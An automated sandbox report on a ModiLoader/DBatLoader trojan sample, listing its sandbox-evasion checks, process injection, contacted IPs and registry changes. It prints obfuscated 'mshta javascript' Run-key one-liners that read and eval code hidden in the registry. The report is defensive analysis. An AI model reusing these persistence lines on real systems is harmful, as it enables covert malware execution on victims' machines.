Malware Analysis Report

2024-08-06 14:26

Sample ID 240527-ah6cpaab85
Target 774750e7081bfd239833590441172f7e_JaffaCakes118
SHA256 a858bcf2d69d9791cb443cd0b944c199807b41e6d9050afda993eabf03812c8d
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a858bcf2d69d9791cb443cd0b944c199807b41e6d9050afda993eabf03812c8d

Threat Level: Known bad

The file 774750e7081bfd239833590441172f7e_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Adds policy Run key to start application

Deletes itself

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:13

Reported

2024-05-27 00:16

Platform

win7-20240215-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:aZADHY9=\"wfQzCIPwQ3\";nA79=new%20ActiveXObject(\"WScript.Shell\");CJ6N7nAsU=\"2xPWZv22\";ite9Q=nA79.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4473aafa5e\\\\6ffbda80\");v60EMPwkR=\"JcSe1vJ8X\";eval(ite9Q);P1I5nbmuL=\"pjNNdw1YK\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:TTk9cyr=\"nA17Xx\";X3l7=new%20ActiveXObject(\"WScript.Shell\");ct0NDXjh=\"zTS\";rn3zA8=X3l7.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4473aafa5e\\\\6ffbda80\");RtzWz6S=\"Aoxh6b\";eval(rn3zA8);M0BgfJ3h=\"IKtiFraY\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:f6hwjXSQb5=\"IEfNwk4s1B\";l4j=new%20ActiveXObject(\"WScript.Shell\");JeiBO5oKG=\"K9\";lQy3G=l4j.RegRead(\"HKCU\\\\software\\\\4473aafa5e\\\\6ffbda80\");apy4MHQ=\"NWbo\";eval(lQy3G);ra5VCfkQm=\"c0pMK2IG\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2628 wrote to memory of 2752 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2296 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 1460 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 38.189.71.172:80 tcp
US 143.209.12.146:80 tcp
US 17.240.167.64:80 tcp
EG 82.201.204.3:8080 tcp
US 96.156.44.53:80 tcp
US 65.154.238.126:80 tcp
IN 202.88.165.175:80 tcp
RU 151.236.89.174:80 tcp
US 147.134.230.63:443 tcp
RU 151.236.89.174:80 151.236.89.174 tcp
US 55.225.154.209:8080 tcp
US 12.220.123.94:80 tcp
US 184.136.146.43:8080 tcp
IT 93.53.181.102:80 tcp
FR 163.67.15.200:80 tcp
DE 2.200.185.109:80 tcp
US 134.73.60.3:80 tcp
GB 94.185.188.120:80 tcp
AT 82.218.103.216:80 tcp
JP 126.53.251.151:80 tcp
JP 219.55.18.132:8080 tcp
US 44.61.130.70:80 tcp
NL 83.247.2.169:80 tcp
US 12.141.145.61:80 tcp
US 11.171.97.213:8080 tcp
CL 200.86.78.229:80 tcp
US 65.224.82.151:80 tcp
FR 91.171.210.79:80 tcp
CA 154.11.69.61:80 tcp
MA 196.116.100.156:80 tcp
PT 95.94.119.191:80 tcp
DE 51.152.154.30:8080 tcp
US 209.237.88.216:80 tcp
US 184.126.40.115:80 tcp
US 35.26.237.103:80 tcp
PK 154.198.103.53:443 tcp
US 33.46.227.131:443 tcp
US 128.57.232.227:80 tcp
US 216.213.211.232:80 tcp
US 69.199.150.148:80 tcp
CN 59.202.120.144:80 tcp
FI 81.209.54.47:80 tcp
US 132.135.97.32:443 tcp
NL 194.33.16.241:80 tcp
EG 197.160.128.126:80 tcp
US 198.153.19.160:80 tcp
US 131.218.138.174:80 tcp
JM 72.27.168.109:80 tcp
KR 211.105.37.118:80 tcp
CH 212.243.149.5:80 tcp
US 65.52.31.147:80 tcp
CH 57.24.128.218:80 tcp
US 150.250.230.158:80 tcp
FR 78.248.173.19:80 tcp
US 104.148.233.122:443 tcp
US 17.191.100.231:80 tcp
US 155.1.89.132:80 tcp
CN 36.155.26.159:80 tcp
JP 143.221.164.237:80 tcp
US 15.176.130.221:80 tcp
US 170.127.45.94:80 tcp
MX 148.215.163.220:80 tcp
JP 27.135.93.19:80 tcp
US 132.24.22.245:80 tcp
US 150.174.222.248:443 tcp
US 216.35.125.228:80 tcp
US 26.95.100.242:80 tcp
US 24.165.244.185:80 tcp
US 17.245.31.228:80 tcp
US 174.141.83.100:80 tcp
US 7.207.15.175:80 tcp
CN 175.47.48.11:80 tcp
RU 151.236.89.174:80 151.236.89.174 tcp
RU 213.145.38.51:80 tcp
TW 210.200.89.93:80 tcp
US 98.40.178.203:80 tcp
JP 153.249.5.84:80 tcp
US 4.62.91.5:80 tcp
US 15.75.209.141:80 tcp
JP 220.97.207.210:80 tcp
DE 77.5.39.40:80 tcp
US 208.111.240.150:80 tcp
SG 43.70.167.106:80 tcp
US 132.24.210.42:443 tcp
EG 154.129.112.131:80 tcp
RU 94.180.161.224:80 tcp
IT 195.225.123.116:80 tcp
KR 61.76.172.192:80 tcp
NZ 165.205.212.236:80 tcp
US 50.246.111.170:80 tcp
US 76.163.213.7:80 tcp
US 35.203.169.44:80 tcp
US 147.144.99.208:80 tcp
TW 120.109.107.43:8080 tcp
DE 164.60.239.178:8080 tcp
US 96.240.159.134:80 tcp
US 44.11.161.164:80 tcp
IN 175.40.154.42:8080 tcp
CN 118.30.178.213:80 tcp
US 22.163.249.4:80 tcp
FR 57.131.118.198:80 tcp
CO 181.255.176.216:80 tcp
MA 105.157.115.181:80 tcp
TR 82.222.155.185:80 tcp
NL 145.118.89.5:80 tcp
CN 36.221.146.31:80 tcp
BR 200.81.52.113:80 tcp
TR 46.45.165.141:443 tcp
US 153.40.211.71:443 tcp
US 97.170.29.156:80 tcp
US 172.74.94.219:80 tcp
FR 86.227.85.227:80 tcp
US 208.234.191.245:80 tcp
US 148.74.128.146:8080 tcp
JP 150.80.178.53:80 tcp
CN 223.97.209.168:80 tcp
IT 217.58.14.179:80 tcp
IT 109.116.171.112:80 tcp
US 173.138.148.14:80 tcp
QA 37.210.123.37:80 tcp
US 173.226.156.201:80 tcp
US 209.113.139.157:80 tcp
IN 13.205.66.38:80 tcp
KR 121.180.52.2:80 tcp
CO 186.83.25.205:80 tcp
DE 51.181.71.182:80 tcp
CN 222.243.96.217:80 tcp
AR 190.247.2.106:80 tcp
BR 189.62.80.193:443 tcp
US 134.55.3.121:80 tcp
KR 59.3.66.160:80 tcp
CN 1.182.241.105:80 tcp
AU 172.196.54.77:8080 tcp
US 173.188.228.244:80 tcp
US 199.234.185.104:80 tcp
RU 151.236.89.174:80 151.236.89.174 tcp
ID 36.79.18.87:80 tcp
IT 87.2.247.39:80 tcp
US 192.110.120.24:80 tcp
FR 77.132.123.219:443 tcp
PA 181.197.172.168:80 tcp
US 165.17.102.234:80 tcp
TR 94.122.213.89:80 tcp
CN 36.216.148.231:443 tcp
CN 110.127.123.230:80 tcp
JP 60.152.238.101:80 tcp
CN 61.237.184.226:80 tcp
JP 110.162.249.118:8080 tcp
US 100.158.221.55:80 tcp
CN 36.193.96.218:80 tcp
US 184.59.131.46:80 tcp
US 215.219.44.137:80 tcp
TR 176.219.244.3:80 tcp
US 199.255.140.70:443 tcp
SK 62.197.247.109:80 tcp
US 15.26.141.211:80 tcp
US 141.148.118.3:80 tcp
JP 157.16.152.53:80 tcp
US 199.75.204.105:80 tcp
NL 178.230.138.71:8080 tcp
US 18.220.85.5:80 tcp
US 155.46.167.209:80 tcp
GB 94.9.147.94:80 tcp
CL 164.77.224.72:443 tcp
KR 112.188.218.90:80 tcp
US 29.81.140.96:80 tcp
TW 59.118.130.178:80 tcp
US 69.36.214.170:80 tcp
CN 120.222.28.117:80 tcp
US 63.235.33.133:80 tcp
CN 182.84.2.189:80 tcp
US 152.7.167.104:80 tcp
US 69.151.238.110:80 tcp
US 69.61.200.109:80 tcp
NO 194.248.167.255:80 tcp
US 199.139.173.232:443 tcp
NL 85.145.126.126:80 tcp
US 76.247.59.237:8080 tcp
DE 213.95.159.38:80 tcp
US 98.204.200.70:80 tcp
CN 150.122.106.245:8080 tcp
BR 191.209.224.173:80 tcp
KR 118.44.109.10:80 tcp
BR 186.233.192.27:80 tcp
BR 170.83.225.140:80 tcp
MW 41.221.98.251:80 tcp
US 167.185.164.221:80 tcp
US 68.237.73.198:80 tcp
FR 78.200.146.39:80 tcp
US 34.231.188.11:80 tcp
US 140.33.242.126:80 tcp

Files

memory/2208-0-0x0000000001F70000-0x0000000001FE0000-memory.dmp

memory/2208-1-0x0000000001C00000-0x0000000001C01000-memory.dmp

memory/2208-3-0x0000000001C00000-0x0000000001C01000-memory.dmp

memory/2208-2-0x0000000001C00000-0x0000000001C01000-memory.dmp

memory/2208-4-0x0000000001F70000-0x0000000001FE0000-memory.dmp

memory/2208-5-0x0000000001C00000-0x0000000001C01000-memory.dmp

memory/2208-6-0x0000000000400000-0x000000000048C000-memory.dmp

memory/2208-8-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2208-9-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2208-12-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2208-11-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2208-10-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2208-14-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2628-18-0x0000000000E30000-0x0000000000E37000-memory.dmp

memory/2208-20-0x0000000000400000-0x000000000048C000-memory.dmp

memory/2628-22-0x0000000000E30000-0x0000000000E37000-memory.dmp

memory/2628-27-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2628-26-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2628-25-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2628-24-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2628-23-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2628-28-0x0000000000190000-0x000000000025C000-memory.dmp

memory/2752-33-0x0000000000E30000-0x0000000000E37000-memory.dmp

memory/2752-37-0x0000000000E30000-0x0000000000E37000-memory.dmp

memory/2752-38-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-40-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-39-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-43-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-41-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-46-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-44-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-49-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-52-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-51-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-45-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-50-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-48-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-47-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2296-53-0x0000000000E30000-0x0000000000E37000-memory.dmp

memory/2296-55-0x0000000000E30000-0x0000000000E37000-memory.dmp

memory/2296-57-0x0000000000090000-0x000000000015C000-memory.dmp

memory/2296-61-0x0000000000090000-0x000000000015C000-memory.dmp

memory/2296-60-0x0000000000090000-0x000000000015C000-memory.dmp

memory/2296-59-0x0000000000090000-0x000000000015C000-memory.dmp

memory/2296-58-0x0000000000090000-0x000000000015C000-memory.dmp

memory/2296-56-0x0000000000090000-0x000000000015C000-memory.dmp

memory/2752-62-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/2752-63-0x00000000001B0000-0x000000000027C000-memory.dmp

memory/1460-68-0x0000000000090000-0x000000000015C000-memory.dmp

memory/1460-71-0x0000000000090000-0x000000000015C000-memory.dmp

memory/1460-70-0x0000000000090000-0x000000000015C000-memory.dmp

memory/1460-69-0x0000000000090000-0x000000000015C000-memory.dmp

memory/1460-67-0x0000000000090000-0x000000000015C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:13

Reported

2024-05-27 00:16

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
